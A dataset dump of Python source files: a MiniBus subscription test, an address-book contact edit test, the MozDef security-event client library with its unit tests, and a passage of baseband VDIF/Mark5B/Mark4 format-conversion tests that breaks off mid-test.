| text | repo_name | path | language | license | size | score |
|---|---|---|---|---|---|---|
| stringlengths 6–947k | stringlengths 5–100 | stringlengths 4–231 | stringclasses (1 value) | stringclasses (15 values) | int64 6–947k | float64 0–0.34 |
import unittest
from jsonschema import SchemaError
from minibus import MiniBusClient
class SyntaxTest(unittest.TestCase):
def setUp(self):
self.client = MiniBusClient()
def callback(self):
pass
def callback2(self):
pass
def test_sub_good(self):
self.client.subscribe("test_sub_good", {'type': "number"}, self.callback)
def test_sub_bad_schema(self):
self.assertRaises(SchemaError, self.client.subscribe,
"test_sub_bad_schema", {"type": "orange"}, self.callback)
def test_sub_schema_mismatch(self):
self.client.subscribe("test_sub_schema_mismatch", {"type": "number"}, self.callback)
self.assertRaises(Exception, self.client.subscribe,
"test_sub_schema_mismatch", {"type": "string"}, self.callback2)
def test_sub_schema_dupcallback(self):
self.client.subscribe("test_sub_schema_dupcallback", {"type": "number"}, self.callback)
self.assertRaises(Exception, self.client.subscribe,
"test_sub_schema_dupcallback", {"type": "number"}, self.callback)
if __name__ == "__main__":
unittest.main()
| allohakdan/minibus | test/test_syntax.py | Python | apache-2.0 | 1,148 | 0.008711 |
from model.contact import Contact
from random import randrange
def test_edit_contact(app, db, check_ui):
if len(db.get_contact_list()) == 0:
app.contact.create(Contact(first_name ="Sabina", last_name="test", company="Pewex",
address="osiedle", phone_home="123456789", e_mail="sabina@sabina.pl",
year="2016",))
old_contact = db.get_contact_list()
index = randrange(len(old_contact))
contact = Contact(first_name='Kasia', last_name='Bober')
contact.id = old_contact[index].id
app.contact.edit_contact_by_index(index, contact)
assert len(old_contact) == app.contact.count()
new_contact = db.get_contact_list()
old_contact[index] = contact
assert old_contact == new_contact
if check_ui:
assert sorted(new_contact, key=Contact.id_or_max) == sorted(
app.group.get_contact_list(), key=Contact.id_or_max
)
| sabinaczopik/python_training | test/test_edit_contact.py | Python | apache-2.0 | 949 | 0.004215 |
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
# Copyright (c) 2014 Mozilla Corporation
# Author: gdestuynder@mozilla.com
# Author: ameihm@mozilla.com
import os
import sys
from datetime import datetime
import pytz
import json
import socket
import syslog
# http://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/limits-messages.html
SQS_MAX_MESSAGE_SIZE = 256 * 1024
try:
from requests_futures.sessions import FuturesSession as Session
futures_loaded = True
except ImportError:
from requests import Session
futures_loaded = False
try:
    import boto3
    import botocore.exceptions
    import botocore.parsers
    boto_loaded = True
except ImportError:
    boto_loaded = False
import unittest
class MozDefError(Exception):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return repr(self.msg)
class MozDefMessage(object):
# Supported message types
MSGTYPE_NONE = 0
MSGTYPE_EVENT = 1
MSGTYPE_COMPLIANCE = 2
MSGTYPE_VULNERABILITY = 3
MSGTYPE_ASSETHINT = 4
MSGTYPE_RRA = 5
def __init__(self, url):
self._msgtype = self.MSGTYPE_NONE
self.log = {}
self._sendlog = {}
self._httpsession = Session()
self._httpsession.trust_env = False
self._url = url
self.hostname = socket.getfqdn()
# This is due to some systems incorrectly
# setting the hostname field to localhost.localdomain
# so, we add logic to use a different 'hostname' method
# if that's the case
if self.hostname == 'localhost.localdomain':
self.hostname = socket.gethostname()
# Set some default options
self._send_to_syslog = False
self._send_to_sqs = False
self._syslog_only = False
self._fire_and_forget = False
self._verify_certificate = False
self._verify_path = None
def validate(self):
return True
def validate_log(self):
return True
def set_verify(self, f):
self._verify_certificate = f
def set_verify_path(self, p):
self._verify_path = p
def set_fire_and_forget(self, f):
self._fire_and_forget = f
def set_sqs_queue_name(self, f):
self._sqs_queue_name = f
def set_sqs_aws_account_id(self, f):
self._sqs_aws_account_id = f
def set_sqs_region(self, f):
self._sqs_region = f
def set_send_to_sqs(self, f):
self._send_to_sqs = f
def set_send_to_syslog(self, f, only_syslog=False):
self._send_to_syslog = f
self._syslog_only = only_syslog
def syslog_convert(self):
raise MozDefError('message type does not support syslog conversion')
def construct(self):
raise MozDefError('subclass of MozDefMessage must override construct()')
def _httpsession_cb(self, session, response):
if response.result().status_code != 200:
if not self._fire_and_forget:
raise MozDefError('POST failed with code %r' % \
response.result().status_code)
def send_syslog(self):
raise MozDefError('message type does not support syslog submission')
def send(self):
if not self.validate():
raise MozDefError('message failed validation')
self.construct()
if not self.validate_log():
raise MozDefError('message failed post construct validation')
if self._send_to_syslog:
self.send_syslog()
if self._syslog_only:
return
if self._send_to_sqs:
self.send_sqs()
return
vflag = self._verify_certificate
if vflag:
if self._verify_path != None:
vflag = self._verify_path
buf = json.dumps(self._sendlog, sort_keys=True, indent=4)
        # Compatibility notes:
        # When updating either path (futures_loaded or not loaded) please ensure both have the same functionality
        # futures_loaded is used by Python 2, the non-loaded version is for Python 3
if futures_loaded:
self._httpsession.post(self._url, buf,
verify=vflag,
background_callback=self._httpsession_cb)
else:
response = self._httpsession.post(self._url, buf,
verify=vflag)
if response.ok == False:
if not self._fire_and_forget:
raise MozDefError('POST failed with code %r msg %s' % \
(response.status_code, response.text))
# Simple Message Submission
#
# This class wraps the new MozDefEvent class to provide support for
# older applications that use the legacy API, and provide simplified access
# to generation of event messages.
class MozDefMsg(object):
def __init__(self, hostname, summary=None, category='event',
severity='INFO', tags=[], details={}):
self.summary = summary
self.category = category
self.details = details
self.tags = tags
self.severity = severity
self.hostname = hostname
self.log = {}
self.log['details'] = {}
self.log['tags'] = []
self.fire_and_forget_mode = False
self.verify_certificate = True
self.sendToSyslog = False
self.sendToSqs = False
self.sqsQueueName = None
self.sqsAWSAccountId = None
self.sqsRegion = None
self.syslogOnly = False
def send(self, summary=None, category=None, severity=None, tags=None,
details=None):
tsummary = summary
tcategory = category
tseverity = severity
ttags = tags
tdetails = details
if tsummary == None:
tsummary = self.summary
if tcategory == None:
tcategory = self.category
if tseverity == None:
tseverity = self.severity
if ttags == None:
ttags = self.tags
if tdetails == None:
tdetails = self.details
amsg = MozDefEvent(self.hostname)
amsg.set_simple_update_log(self.log)
amsg.summary = tsummary
amsg.tags = ttags
amsg.details = tdetails
if type(self.verify_certificate) is str:
amsg.set_verify(True)
amsg.set_verify_path(self.verify_certificate)
else:
amsg.set_verify(self.verify_certificate)
amsg.set_fire_and_forget(self.fire_and_forget_mode)
amsg.set_category(tcategory)
amsg.set_severity_from_string(tseverity)
amsg.set_send_to_syslog(self.sendToSyslog,
only_syslog=self.syslogOnly)
amsg.set_sqs_queue_name(self.sqsQueueName)
amsg.set_sqs_aws_account_id(self.sqsAWSAccountId)
amsg.set_sqs_region(self.sqsRegion)
amsg.set_send_to_sqs(self.sendToSqs)
amsg.send()
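# A minimal usage sketch for the legacy wrapper above; the endpoint URL and
# the field values are hypothetical placeholders, not part of this module.
def _example_legacy_send():
    msg = MozDefMsg('https://mozdef.example.com/events', tags=['demo'])
    msg.send('something happened', details={'user': 'alice'})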
class MozDefVulnerability(MozDefMessage):
def validate_log(self):
for k in ['utctimestamp', 'description', 'vuln', 'asset',
'sourcename']:
if k not in self._sendlog.keys():
return False
for k in ['assetid', 'ipv4address', 'hostname', 'macaddress']:
if k not in self._sendlog['asset'].keys():
return False
for k in ['status', 'vulnid', 'title', 'discovery_time', 'age_days',
'known_malware', 'known_exploits', 'cvss', 'cves']:
if k not in self._sendlog['vuln'].keys():
return False
return True
def construct(self):
self._sendlog = self.log
def __init__(self, url):
MozDefMessage.__init__(self, url)
self._msgtype = self.MSGTYPE_VULNERABILITY
class MozDefEvent(MozDefMessage):
SEVERITY_INFO = 0
SEVERITY_WARNING = 1
SEVERITY_CRITICAL = 2
SEVERITY_ERROR = 3
SEVERITY_DEBUG = 4
_sevmap = {
SEVERITY_INFO: ['INFO', syslog.LOG_INFO],
SEVERITY_WARNING: ['WARNING', syslog.LOG_WARNING],
SEVERITY_CRITICAL: ['CRITICAL', syslog.LOG_CRIT],
SEVERITY_ERROR: ['ERROR', syslog.LOG_ERR],
SEVERITY_DEBUG: ['DEBUG', syslog.LOG_DEBUG],
}
def __init__(self, url):
MozDefMessage.__init__(self, url)
self._msgtype = self.MSGTYPE_EVENT
self._category = 'event'
self._process_name = sys.argv[0]
self._process_id = os.getpid()
self._severity = self.SEVERITY_INFO
self.timestamp = None
self._updatelog = None
self.summary = None
self.tags = []
self.details = {}
def validate(self):
if self.summary == None or self.summary == '':
return False
return True
def set_simple_update_log(self, l):
self._updatelog = l
def set_severity(self, x):
self._severity = x
def set_category(self, x):
self._category = x
def set_severity_from_string(self, x):
self._severity = self.SEVERITY_INFO
for i in self._sevmap:
if self._sevmap[i][0] == x:
self._severity = i
def syslog_convert(self):
s = json.dumps(self._sendlog)
return s
    def send_syslog(self):
        # Map the event severity to the corresponding syslog priority.
        syspri = syslog.LOG_INFO
        for i in self._sevmap:
            if i == self._severity:
                syspri = self._sevmap[i][1]
        syslog.syslog(syspri, self.syslog_convert())
def send_sqs(self):
if not boto_loaded:
raise ImportError("boto3 not loaded")
boto3.setup_default_session(region_name=self._sqs_region)
sqs = boto3.resource('sqs')
if (self._sqs_aws_account_id != None):
queue = sqs.get_queue_by_name(QueueName=self._sqs_queue_name,
QueueOwnerAWSAccountId=self._sqs_aws_account_id)
else:
queue = sqs.get_queue_by_name(QueueName=self._sqs_queue_name)
message_body = json.dumps(self._sendlog)
if len(message_body) > SQS_MAX_MESSAGE_SIZE:
raise MozDefError(
'message length of %s is over the SQS maximum allowed message '
'size of %s' % (len(message_body), SQS_MAX_MESSAGE_SIZE))
try:
response = queue.send_message(MessageBody=message_body)
except (botocore.exceptions.ClientError,
botocore.parsers.ResponseParserError) as e:
raise MozDefError(
'message failed to send to SQS due to %s' % e)
return response
def construct(self):
self._sendlog = {}
if self._updatelog != None:
self._sendlog = self._updatelog
if self.timestamp == None:
self._sendlog['timestamp'] = \
pytz.timezone('UTC').localize(datetime.utcnow()).isoformat()
else:
self._sendlog['timestamp'] = self.timestamp
self._sendlog['processid'] = self._process_id
self._sendlog['processname'] = self._process_name
self._sendlog['hostname'] = self.hostname
self._sendlog['category'] = self._category
self._sendlog['details'] = self.details
self._sendlog['summary'] = self.summary
self._sendlog['tags'] = self.tags
for i in self._sevmap:
if i == self._severity:
self._sendlog['severity'] = self._sevmap[i][0]
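# A usage sketch following the pattern exercised by the tests below; the
# endpoint URL and the event fields are hypothetical placeholders.
def _example_event_send():
    e = MozDefEvent('https://mozdef.example.com/events')
    e.summary = 'demo event'
    e.tags = ['demo']
    e.details = {'user': 'alice'}
    e.set_severity(MozDefEvent.SEVERITY_WARNING)
    e.send()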
class MozDefRRA(MozDefEvent):
def validate(self):
if not MozDefEvent.validate(self):
return False
if self.category != 'rra_data':
return False
if len(self.details.keys()) == 0:
return False
return True
def __init__(self, url):
MozDefEvent.__init__(self, url)
self._msgtype = self.MSGTYPE_RRA
self._category = 'rra_data'
class MozDefAssetHint(MozDefEvent):
def validate(self):
if not MozDefEvent.validate(self):
return False
# A hint event should always have details
if len(self.details.keys()) == 0:
return False
return True
def __init__(self, url):
MozDefEvent.__init__(self, url)
self._msgtype = self.MSGTYPE_ASSETHINT
self._category = 'asset_hint'
class MozDefCompliance(MozDefEvent):
def validate_log(self):
if 'details' not in self._sendlog:
return False
t = self._sendlog['details']
for k in ['target', 'policy', 'check', 'compliance', 'link',
'utctimestamp']:
if k not in t.keys():
return False
for k in ['level', 'name', 'url']:
if k not in t['policy'].keys():
return False
for k in ['description', 'location', 'name', 'test']:
if k not in t['check'].keys():
return False
for k in ['type', 'value']:
if k not in t['check']['test'].keys():
return False
return True
def __init__(self, url):
MozDefEvent.__init__(self, url)
self._msgtype = self.MSGTYPE_COMPLIANCE
self._category = 'complianceitems'
class MozDefTests(unittest.TestCase):
def create_valid_event(self):
self.emsg_summary = 'a test event'
self.emsg_tags = ['generic', 'test']
self.emsg_details = {'one': 1, 'two': 'two'}
def create_valid_vuln(self):
self.vulnmsg = {}
self.vulnmsg['description'] = 'system vulnerability management ' \
'automation'
self.vulnmsg['utctimestamp'] = '2015-01-21T15:33:51.136378+00:00'
self.vulnmsg['sourcename'] = 'development'
self.vulnmsg['asset'] = {}
self.vulnmsg['asset']['assetid'] = 23
self.vulnmsg['asset']['ipv4address'] = '1.2.3.4'
self.vulnmsg['asset']['macaddress'] = ''
self.vulnmsg['asset']['hostname'] = 'git.mozilla.com'
self.vulnmsg['vuln'] = {}
self.vulnmsg['vuln']['status'] = 'new'
self.vulnmsg['vuln']['vulnid'] = 'nexpose:43883'
self.vulnmsg['vuln']['title'] = \
'RHSA-2013:1475: postgresql and postgresql84 security update'
self.vulnmsg['vuln']['discovery_time'] = 1421845863
self.vulnmsg['vuln']['age_days'] = 32.7
self.vulnmsg['vuln']['known_malware'] = False
self.vulnmsg['vuln']['known_exploits'] = False
self.vulnmsg['vuln']['cvss'] = 8.5
self.vulnmsg['vuln']['cves'] = ['CVE-2013-022', 'CVE-2013-1900']
def create_valid_comp(self):
self.compmsg = {}
self.compmsg['target'] = 'www.mozilla.com'
self.compmsg['utctimestamp'] = '2015-03-04T18:25:52.849272+00:00'
self.compmsg['tags'] = {
'operator': 'it',
'autogroup': 'opsec'
}
self.compmsg['compliance'] = True
self.compmsg['link'] = 'http://a.url'
self.compmsg['policy'] = {
'url': 'http://another.url',
'name': 'system',
'level': 'medium'
}
self.compmsg['check'] = {
'test': {
'type': 'nexpose',
'name': 'assess',
'value': 'nexpose'
},
'location': 'endpoint',
'ref': 'sysmediumupdates1',
'name': 'vulnerability scanner check',
'description': 'validate system patch level'
}
def setUp(self):
self.create_valid_vuln()
self.create_valid_comp()
self.create_valid_event()
def testFailMessageSend(self):
m = MozDefMessage('http://127.0.0.1')
with self.assertRaises(MozDefError):
m.send()
def testFailEventSend(self):
m = MozDefEvent('http://127.0.0.1:1/nonexistent')
with self.assertRaises(Exception):
m.send()
def testMozdefMessage(self):
m = MozDefMessage('http://127.0.0.1')
self.assertIsNotNone(m)
self.assertIsNotNone(m.hostname)
self.assertEqual(m._url, 'http://127.0.0.1')
m.hostname = 'examplehostname'
self.assertEqual(m.hostname, 'examplehostname')
def testMozdefEvent(self):
m = MozDefEvent('http://127.0.0.1')
self.assertIsNotNone(m)
self.assertEqual(m._msgtype, MozDefMessage.MSGTYPE_EVENT)
self.assertIsNotNone(m.hostname)
self.assertEqual(m._url, 'http://127.0.0.1')
m.hostname = 'examplehostname'
self.assertEqual(m.hostname, 'examplehostname')
def testMozdefEventValidate(self):
m = MozDefEvent('http://127.0.0.1')
self.assertFalse(m.validate())
m.summary = 'test event'
self.assertTrue(m.validate())
def testMozdefEventConstruct(self):
m = MozDefEvent('http://127.0.0.1')
m.summary = 'test event'
m.construct()
self.assertEqual(m._sendlog['category'], 'event')
self.assertEqual(m._sendlog['summary'], 'test event')
def testMozdefEventHostname(self):
m = MozDefEvent('http://127.0.0.1')
m.hostname = 'samplehostname'
self.assertEqual(m.hostname, 'samplehostname')
def testMozdefVulnValidate(self):
m = MozDefVulnerability('http://127.0.0.1')
self.assertTrue(m.validate())
m.construct()
self.assertFalse(m.validate_log())
m.log = self.vulnmsg
m.construct()
self.assertTrue(m.validate_log())
def testMozdefComplianceValidate(self):
m = MozDefCompliance('http://127.0.0.1')
self.assertFalse(m.validate())
m.summary = 'compliance item'
self.assertTrue(m.validate())
m.construct()
self.assertFalse(m.validate_log())
m.details = self.compmsg
m.construct()
self.assertTrue(m.validate_log())
def testMozdefEventSyslog(self):
m = MozDefEvent('http://127.0.0.1')
m.summary = self.emsg_summary
m.tags = self.emsg_tags
m.details = self.emsg_details
m.set_severity(MozDefEvent.SEVERITY_CRITICAL)
m.construct()
s = m.syslog_convert()
self.assertIsNotNone(s)
m.set_send_to_syslog(True, only_syslog=True)
m.send()
def testMozdefCompSyslog(self):
m = MozDefCompliance('http://127.0.0.1')
m.log = self.compmsg
self.assertIsNotNone(m.syslog_convert())
def testAssetHintValidate(self):
m = MozDefAssetHint('http://127.0.0.1')
self.assertFalse(m.validate())
m.summary = 'an asset hint event'
self.assertFalse(m.validate())
m.details = {'hostname': 'test'}
self.assertTrue(m.validate())
def testAssetHint(self):
m = MozDefAssetHint('http://127.0.0.1')
self.assertIsNotNone(m)
def testRRAValidate(self):
m = MozDefRRA('http://127.0.0.1')
self.assertFalse(m.validate())
m.summary = 'an RRA event'
m.category = 'rra_data'
self.assertFalse(m.validate())
m.details = {'metadata': {'service': 'test'}}
self.assertTrue(m.validate())
def testRRA(self):
m = MozDefRRA('http://127.0.0.1')
self.assertIsNotNone(m)
def testSimpleMsg(self):
m = MozDefMsg('http://127.0.0.1', tags=['openvpn', 'duosecurity'])
self.assertIsNotNone(m)
def testSimpleSqs(self):
m = MozDefMsg('http://127.0.0.1', tags=['openvpn', 'duosecurity'])
if not boto_loaded:
raise ImportError("Boto3 is not loaded")
m.sendToSqs = True
m.sqsRegion = 'us-west-1'
m.sqsQueueName = 'test'
m.sqsAWSAccountId = 'test'
m.send('hi')
self.assertIsNotNone(m)
def testSimpleSyslog(self):
m = MozDefMsg('http://127.0.0.1', tags=['openvpn', 'duosecurity'])
m.sendToSyslog = True
m.syslogOnly = True
m.fire_and_forget_mode = True
m.log['somefield'] = 'test'
with self.assertRaises(MozDefError):
m.send()
m.send('hi')
def testSimpleSyslogDetails(self):
m = MozDefMsg('http://127.0.0.1')
m.sendToSyslog = True
m.syslogOnly = True
m.fire_and_forget_mode = True
m.send('hi', details={'username': 'user'}, tags=['y0'])
def testMozdefCompSyslogSend(self):
m = MozDefCompliance('http://127.0.0.1')
m.summary = 'compliance item'
m.details = self.compmsg
m.set_send_to_syslog(True, only_syslog=True)
m.send()
if __name__ == "__main__":
unittest.main(verbosity=2)
| ameihm0912/mozdef_client | mozdef_client.py | Python | mpl-2.0 | 20,473 | 0.00254 |
# Licensed under the GPLv3 - see LICENSE
import pytest
import numpy as np
import astropy.units as u
from astropy.time import Time
from .. import vdif
from .. import mark4
from .. import mark5b
from .. import dada
from ..base.encoding import EIGHT_BIT_1_SIGMA
from ..data import (SAMPLE_MARK4 as SAMPLE_M4, SAMPLE_MARK5B as SAMPLE_M5B,
SAMPLE_VDIF, SAMPLE_MWA_VDIF as SAMPLE_MWA, SAMPLE_DADA,
SAMPLE_BPS1_VDIF)
class TestVDIFMark5B:
"""Simplest conversion: VDIF frame containing Mark5B data (EDV 0xab)."""
def test_header(self):
"""Check Mark 5B header information can be stored in a VDIF header."""
with open(SAMPLE_M5B, 'rb') as fh:
# Start time kiloday is needed for Mark 5B to calculate time.
m5h1 = mark5b.Mark5BHeader.fromfile(fh, kday=56000)
# For the payload, pass in how data is encoded.
m5pl = mark5b.Mark5BPayload.fromfile(fh, sample_shape=(8,), bps=2)
# A not-at-the-start header for checking times.
m5h2 = mark5b.Mark5BHeader.fromfile(fh, kday=56000)
# Create VDIF headers based on both the Mark 5B header and payload.
header1 = vdif.VDIFHeader.from_mark5b_header(
m5h1, nchan=m5pl.sample_shape.nchan, bps=m5pl.bps)
header2 = vdif.VDIFHeader.from_mark5b_header(
m5h2, nchan=m5pl.sample_shape.nchan, bps=m5pl.bps)
for i, (m5h, header) in enumerate(((m5h1, header1), (m5h2, header2))):
assert m5h['frame_nr'] == i
# Check all direct information is set correctly.
assert all(m5h[key] == header[key] for key in m5h.keys())
assert header['mark5b_frame_nr'] == m5h['frame_nr']
assert header.kday == m5h.kday
# As well as the time calculated from the header information.
assert header.time == m5h.time
# Check information on the payload is also correct.
assert header.nchan == 8
assert header.bps == 2
assert not header['complex_data']
assert header.frame_nbytes == 10032
assert header.nbytes == 32
assert header.payload_nbytes == m5h.payload_nbytes
assert (header.samples_per_frame
== 10000 * 8 // m5pl.bps // m5pl.sample_shape.nchan)
# Check that we can handle > 512 Mbps sampling rate.
header3 = vdif.VDIFHeader.from_mark5b_header(
m5h2, nchan=m5pl.sample_shape.nchan, bps=m5pl.bps,
sample_rate=64*u.MHz)
assert header3.time == header2.time
assert header3['frame_nr'] == m5h2['frame_nr']
# A copy might remove any `kday` keywords set, but should still work
# (Regression test for #34)
header_copy = header2.copy()
assert header_copy == header2
header_copy.verify()
# But it should not remove `kday` to start with (#35)
assert header_copy.kday == header2.kday
# May as well check that with a corrupt 'bcd_fraction' we can still
# get the right time using the frame number.
header_copy['bcd_fraction'] = 0
# This is common enough that we should not fail verification.
header_copy.verify()
# However, it should also cause just getting the time to fail
# unless we pass in a frame rate.
with pytest.raises(ValueError):
header_copy.time
frame_rate = 32. * u.MHz / header.samples_per_frame
assert abs(header_copy.get_time(frame_rate=frame_rate)
- m5h2.time) < 1.*u.ns
def test_payload(self):
"""Check Mark 5B payloads can used in a Mark5B VDIF payload."""
# Get Mark 5B header, payload, and construct VDIF header, as above.
with open(SAMPLE_M5B, 'rb') as fh:
m5h = mark5b.Mark5BHeader.fromfile(fh, kday=56000)
m5pl = mark5b.Mark5BPayload.fromfile(fh, sample_shape=(8,), bps=2)
header = vdif.VDIFHeader.from_mark5b_header(
m5h, nchan=m5pl.sample_shape.nchan, bps=m5pl.bps)
# Create VDIF payload from the Mark 5B encoded payload.
payload = vdif.VDIFPayload(m5pl.words, header)
# Check that the payload (i.e., encoded data) is the same.
assert np.all(payload.words == m5pl.words)
# And check that if we decode the payload, we get the same result.
assert np.all(payload.data == m5pl.data)
# Now construct a VDIF payload from the Mark 5B data, checking that
# the encoding works correctly too.
payload2 = vdif.VDIFPayload.fromdata(m5pl.data, header)
assert np.all(payload2.words == m5pl.words)
assert np.all(payload2.data == m5pl.data)
        # Mark 5B data cannot be complex. Check that this raises an exception.
header2 = header.copy()
with pytest.raises(ValueError):
header2.complex_data = True
with pytest.raises(ValueError):
header2['complex_data'] = True
with pytest.raises(ValueError):
vdif.VDIFPayload.fromdata(m5pl.data.view(complex), bps=2, edv=0xab)
def test_frame(self):
"""Check a whole Mark 5B frame can be translated to VDIF."""
with mark5b.open(SAMPLE_M5B, 'rb', ref_time=Time(57000, format='mjd'),
nchan=8, bps=2) as fh:
# pick second frame just to be different from header checks above.
fh.seek(10016)
m5f = fh.read_frame()
assert m5f['frame_nr'] == 1
frame = vdif.VDIFFrame.from_mark5b_frame(m5f)
assert frame.nbytes == 10032
assert frame.shape == (5000, 8)
assert np.all(frame.data == m5f.data)
assert frame.time == m5f.time
def test_stream(self):
"""Check we can encode a whole stream."""
class TestVDIF0VDIF1:
"""Conversion between EDV versions."""
def test_stream(self, tmpdir):
with vdif.open(SAMPLE_MWA, 'rs', sample_rate=1.28*u.MHz) as f0:
h0 = f0.header0
d0 = f0.read(1024)
kwargs = dict(h0)
kwargs['edv'] = 1
fl = str(tmpdir.join('test1.vdif'))
with vdif.open(fl, 'ws', sample_rate=1.28*u.MHz, **kwargs) as f1w:
h1w = f1w.header0
assert list(h1w.words[:4]) == list(h0.words[:4])
assert h1w.sample_rate == 1.28*u.MHz
f1w.write(d0)
with vdif.open(fl, 'rs') as f1r:
h1r = f1r.header0
d1r = f1r.read(1024)
assert h1r.words[:4] == h0.words[:4]
assert h1w.sample_rate == 1.28*u.MHz
assert np.all(d1r == d0)
class TestMark5BToVDIF3:
"""Real conversion: Mark5B to VDIF EDV 3, and back to Mark5B"""
def test_header(self):
with open(SAMPLE_M5B, 'rb') as fh:
m5h = mark5b.Mark5BHeader.fromfile(fh, kday=56000)
m5pl = mark5b.Mark5BPayload.fromfile(fh, sample_shape=(8,), bps=2)
# check that we have enough information to create VDIF EDV 3 header.
header = vdif.VDIFHeader.fromvalues(
edv=3, bps=m5pl.bps, sample_shape=(1,), station='WB',
time=m5h.time, sample_rate=32.*u.MHz, complex_data=False)
assert header.time == m5h.time
def test_stream(self, tmpdir):
"""Convert Mark 5B data stream to VDIF."""
# Here, we need to give how the data is encoded, since the data do not
# self-describe this. Furthermore, we need to pass in a rough time,
# and the rate at which samples were taken, so that absolute times can
# be calculated.
with mark5b.open(SAMPLE_M5B, 'rs', sample_rate=32.*u.MHz, kday=56000,
nchan=8, bps=2) as fr:
m5h = fr.header0
# create VDIF header from Mark 5B stream information.
header = vdif.VDIFHeader.fromvalues(
edv=3, bps=fr.bps, nchan=1, station='WB', time=m5h.time,
sample_rate=32.*u.MHz, complex_data=False)
data = fr.read(20000) # enough to fill one EDV3 frame.
time1 = fr.tell(unit='time')
# Get a file name in our temporary testing directory.
vdif_file = str(tmpdir.join('converted.vdif'))
# create and fill vdif file with converted data.
with vdif.open(vdif_file, 'ws', header0=header,
nthread=data.shape[1]) as fw:
assert (fw.tell(unit='time') - m5h.time) < 2. * u.ns
fw.write(data)
assert (fw.tell(unit='time') - time1) < 2. * u.ns
# Check two files contain same information.
with mark5b.open(SAMPLE_M5B, 'rs', sample_rate=32.*u.MHz, kday=56000,
nchan=8, bps=2) as fm, vdif.open(vdif_file,
'rs') as fv:
assert fm.header0.time == fv.header0.time
dm = fm.read(20000)
dv = fv.read(20000)
assert np.all(dm == dv)
assert fm.offset == fv.offset
assert fm.tell(unit='time') == fv.tell(unit='time')
# Convert VDIF file back to Mark 5B
mark5b_new_file = str(tmpdir.join('reconverted.mark5b'))
hv = fv.header0
hm = fm.header0
# Here, we fill some unimportant Mark 5B header information by
# hand, so we can compare byte-for-byte.
with mark5b.open(mark5b_new_file, 'ws', sample_rate=hv.sample_rate,
nchan=dv.shape[1], bps=hv.bps,
time=hv.time, user=hm['user'],
internal_tvg=hm['internal_tvg']) as fw:
fw.write(dv)
with open(SAMPLE_M5B, 'rb') as fh_orig, open(mark5b_new_file,
'rb') as fh_new:
assert fh_orig.read() == fh_new.read()
class TestVDIF3ToMark5B:
"""Real conversion: VDIF EDV 3 to Mark5B."""
def test_header(self):
with open(SAMPLE_VDIF, 'rb') as fh:
vh = vdif.VDIFHeader.fromfile(fh)
header = mark5b.Mark5BHeader.fromvalues(time=vh.time)
assert header.time == vh.time
def test_stream(self, tmpdir):
with vdif.open(SAMPLE_VDIF, 'rs') as fr:
vh = fr.header0
data = fr.read(20000) # enough to fill two Mark 5B frames.
fl = str(tmpdir.join('test.m5b'))
with mark5b.open(fl, 'ws', sample_rate=vh.sample_rate,
nchan=data.shape[1], bps=vh.bps, time=vh.time) as fw:
fw.write(data)
with vdif.open(SAMPLE_VDIF, 'rs') as fv, mark5b.open(
fl, 'rs', sample_rate=32.*u.MHz,
ref_time=Time(57000, format='mjd'), nchan=8, bps=2) as fm:
assert fv.header0.time == fm.header0.time
dv = fv.read(20000)
dm = fm.read(20000)
assert np.all(dm == dv)
assert fm.offset == fv.offset
assert fm.tell(unit='time') == fv.tell(unit='time')
class TestVDIF0BPS1ToMark5B:
"""Real conversion: VDIF EDV 3, BPS 1 to Mark 5B."""
def test_stream(self, tmpdir):
with vdif.open(SAMPLE_BPS1_VDIF, 'rs', sample_rate=8*u.MHz) as fr:
start_time = fr.start_time
data = fr.read(5000) # Just one Mark 5B frame.
fl = str(tmpdir.join('test.m5b'))
with mark5b.open(fl, 'ws', sample_rate=8.*u.MHz, nchan=data.shape[1],
bps=1, time=start_time) as fw:
fw.write(data)
fw.write(data)
with vdif.open(SAMPLE_BPS1_VDIF, 'rs',
sample_rate=8*u.MHz) as fv, mark5b.open(
fl, 'rs', sample_rate=8.*u.MHz, nchan=16, bps=1,
ref_time=Time('2018-09-01')) as fm:
assert fv.start_time == fm.start_time
dv = fv.read(5000)
dm = fm.read(5000)
assert np.all(dm == dv)
assert fm.offset == fv.offset
assert fm.tell(unit='time') == fv.tell(unit='time')
dm = fm.read(5000)
assert np.all(dm == dv)
class TestMark4ToVDIF1:
"""Real conversion: Mark 4 to VDIF EDV 1, and back to Mark 4.
    Here, we need to use a VDIF format with a flexible size, since we want
to create invalid frames corresponding to the pieces of data overwritten
by the Mark 4 header.
"""
def test_header(self):
with open(SAMPLE_M4, 'rb') as fh:
fh.seek(0xa88)
m4h = mark4.Mark4Header.fromfile(fh, ntrack=64, decade=2010)
# Check that we have enough information to create VDIF EDV 1 header.
header = vdif.VDIFHeader.fromvalues(
edv=1, bps=m4h.bps, nchan=1, station='Ar', time=m4h.time,
sample_rate=32.*u.MHz, payload_nbytes=640*2//8, complex_data=False)
assert abs(header.time - m4h.time) < 2. * u.ns
def test_stream(self, tmpdir):
with mark4.open(SAMPLE_M4, 'rs', sample_rate=32.*u.MHz,
ntrack=64, decade=2010) as fr:
m4header0 = fr.header0
start_time = fr.start_time
vheader0 = vdif.VDIFHeader.fromvalues(
edv=1, bps=m4header0.bps, nchan=1, station='Ar',
time=start_time, sample_rate=32.*u.MHz,
payload_nbytes=640*2//8, complex_data=False)
assert abs(vheader0.time - start_time) < 2. * u.ns
data = fr.read(80000) # full Mark 4 frame
offset1 = fr.tell()
time1 = fr.tell(unit='time')
number_of_bytes = fr.fh_raw.tell() - 0xa88
with open(SAMPLE_M4, 'rb') as fh:
fh.seek(0xa88)
orig_bytes = fh.read(number_of_bytes)
fl = str(tmpdir.join('test.vdif'))
with vdif.open(fl, 'ws', header0=vheader0,
nthread=data.shape[1]) as fw:
assert (fw.tell(unit='time') - start_time) < 2. * u.ns
# Write first VDIF frame, matching Mark 4 Header, hence invalid.
fw.write(data[:160], valid=False)
# Write remaining VDIF frames, with valid data.
fw.write(data[160:])
assert (fw.tell(unit='time') - time1) < 2. * u.ns
with vdif.open(fl, 'rs') as fv:
assert abs(fv.header0.time - start_time) < 2. * u.ns
expected = vheader0.copy()
expected['invalid_data'] = True
assert fv.header0 == expected
dv = fv.read(80000)
assert np.all(dv == data)
assert fv.offset == offset1
assert abs(fv.tell(unit='time') - time1) < 2.*u.ns
# Convert VDIF file back to Mark 4, and check byte-for-byte.
fl2 = str(tmpdir.join('test.m4'))
